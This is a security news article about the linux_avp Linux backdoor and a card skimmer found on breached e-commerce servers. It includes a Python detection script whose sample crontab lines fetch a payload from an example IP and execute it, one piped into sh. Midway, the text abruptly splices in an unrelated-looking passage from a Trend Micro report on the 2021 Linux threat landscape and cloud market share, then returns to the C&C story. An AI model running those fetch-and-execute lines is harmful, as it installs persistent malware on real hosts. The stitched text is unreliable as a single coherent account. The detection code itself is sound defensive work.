Hackers deploy Linux malware, web skimmer on e-commerce servers

Security researchers have discovered that attackers are also deploying a Linux backdoor on compromised e-commerce servers after injecting a credit card skimmer into the online stores' websites. The skimmer script downloads and injects fake payment forms into the checkout pages that the hacked store displays to its customers. "We found that the attacker started with automated e-commerce attack probes, testing dozens of weaknesses in common online store platforms," Sansec's threat research team revealed.

Linux malware not detected by the security software

The Golang-based malware, spotted by Dutch cybersecurity company Sansec on the same server, was downloaded and executed on the breached servers as an executable named linux_avp. Once started, it immediately deletes itself from disk and disguises itself as a "ps -ef" process, the command normally used to list running processes. While analyzing the linux_avp backdoor, Sansec found that it waited for commands from a server in Beijing hosted on Alibaba's network.

They also found that the malware gains persistence by adding a new crontab entry that re-downloads the malicious payload from its command-and-control server and reinstalls the backdoor if it is detected and removed, or if the server reboots. So far, this backdoor has not been flagged by any of the anti-malware engines on VirusTotal, even though a sample was first uploaded there over a month ago, on October 8.
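The two behaviours described above, a process posing as "ps -ef" whose backing binary has been deleted from disk and a crontab entry that re-downloads and re-executes a payload, are both visible from /proc and the crontab. The following is an added defender's example, not Sansec's code; the process records, cron lines and the 198.51.100.23 address are constructed for illustration.

```python
import os
import re
from dataclasses import dataclass

@dataclass
class Proc:
    pid: int
    cmdline: str  # /proc/<pid>/cmdline with NUL separators replaced by spaces
    exe: str      # readlink of /proc/<pid>/exe; ends in "(deleted)" if unlinked

# Names that malware commonly borrows for its argv[0]; extend to taste.
COMMON_MASKS = {"ps", "sshd", "cron", "bash"}

def masquerading_procs(procs):
    """Return PIDs whose binary was removed while running, or whose argv[0]
    claims a common system tool that does not match the real executable.
    A deleted exe also appears after package upgrades, so triage the hits."""
    hits = []
    for p in procs:
        argv = p.cmdline.split()
        if not argv:
            continue  # kernel threads have an empty cmdline
        claimed = os.path.basename(argv[0])
        real = os.path.basename(p.exe.replace(" (deleted)", ""))
        if p.exe.endswith("(deleted)") or (claimed in COMMON_MASKS and claimed != real):
            hits.append(p.pid)
    return hits

CRON_FETCH = re.compile(r"\b(curl|wget)\b.*https?://", re.I)
CRON_EXEC = re.compile(r"(\|\s*(ba|da)?sh\b|chmod\s+\+x|&&\s*/)")

def suspicious_cron_lines(lines):
    """Return active crontab lines that both fetch from a URL and execute the result,
    the re-download persistence pattern described above."""
    return [l for l in lines
            if not l.lstrip().startswith("#") and CRON_FETCH.search(l) and CRON_EXEC.search(l)]

def scan_live_procs():
    """Build Proc records from a real /proc (Linux only); unreadable PIDs are skipped."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmd = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            procs.append(Proc(int(pid), cmd, os.readlink(f"/proc/{pid}/exe")))
        except OSError:
            continue
    return procs

# Constructed sample data: one genuine ps, one impostor whose binary is gone, one interpreter.
SAMPLE_PROCS = [Proc(1021, "ps -ef", "/usr/bin/ps"),
                Proc(1337, "ps -ef", "/tmp/linux_avp (deleted)"),
                Proc(2001, "python3 app.py", "/usr/bin/python3.10")]
SAMPLE_CRON = ["0 3 * * * /usr/local/bin/backup.sh",
               "*/10 * * * * curl -s http://198.51.100.23/linux_avp -o /tmp/linux_avp && chmod +x /tmp/linux_avp && /tmp/linux_avp",
               "# 0 0 * * * wget http://198.51.100.23/x | sh"]
```

On a live host, pass `scan_live_procs()` to `masquerading_procs` and the output of `crontab -l` (for each user) to `suspicious_cron_lines`.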

Whoever uploaded that sample could be the creator of linux_avp, since it was submitted one day after Sansec's researchers spotted it while investigating the e-commerce site breach.

Linux is powerful, universal, and reliable, but it is not without its flaws; like other operating systems, it is always susceptible to attack. This article discusses the state of Linux security in the first half of 2021 and provides an in-depth look at the Linux threat landscape. We discuss several pressing security issues that affect Linux, including the types of malware that exist in the Linux world, vulnerabilities that affect the Linux operating system, and the various software stacks that run on it. This article will also cover web application security risks and how attackers abuse them to compromise Linux systems running in the cloud.

The data presented in this article comes from the Trend Micro™ Smart Protection Network™ (SPN), the data lake that collects detections from all Trend Micro products. In addition, we collected data from honeypots, sensors, anonymized telemetry, and other backend services. This data reflects the real-world prevalence of malware, exploitation, and vulnerabilities across organizations of every size, from small businesses to large enterprises in various verticals.

Many consider Linux to be a unique operating system due to its stability, flexibility, and open-source nature. Its stellar reputation is backed by many notable accomplishments over the past few years. For example, 100% of the world's top 500 supercomputers run Linux, and 50.5% of the world's top 1,000 websites use it, according to a survey by W3Techs. Our previous article explained how Linux dominates the cloud, running on 90% of public cloud workloads in 2017. Linux is also uniquely well supported for cloud workloads on the best value-for-money Advanced RISC Machines (ARM) processors, such as AWS Graviton. And besides running on 96.3% of the world's top 1 million web servers, Linux also powers smartwatches, bullet trains, and even the world's major space programs.


Among Linux and Unix-based deployments, Red Hat accounts for the largest share of enterprise users, followed by AWS Linux and Ubuntu. Organizations rely on well-maintained Linux distributions for their workloads, and this distribution, as shown in the chart, reflects the support the vendors provide. For example, Red Hat Enterprise Linux (RHEL) and Amazon Linux AMI are typically the first to ship fixes for their supported versions. While this breakdown should come as no surprise to most readers, it is worth noting that about 2.6% of deployments are IBM AIX and Oracle Solaris. Both are known for their stability and robustness, and businesses run critical workloads on these platforms.

At the time of writing, all of the command-and-control (C&C) servers were down, which is consistent with targeted attacks against a small number of victims, where the operators shut down the infrastructure once their goals are met.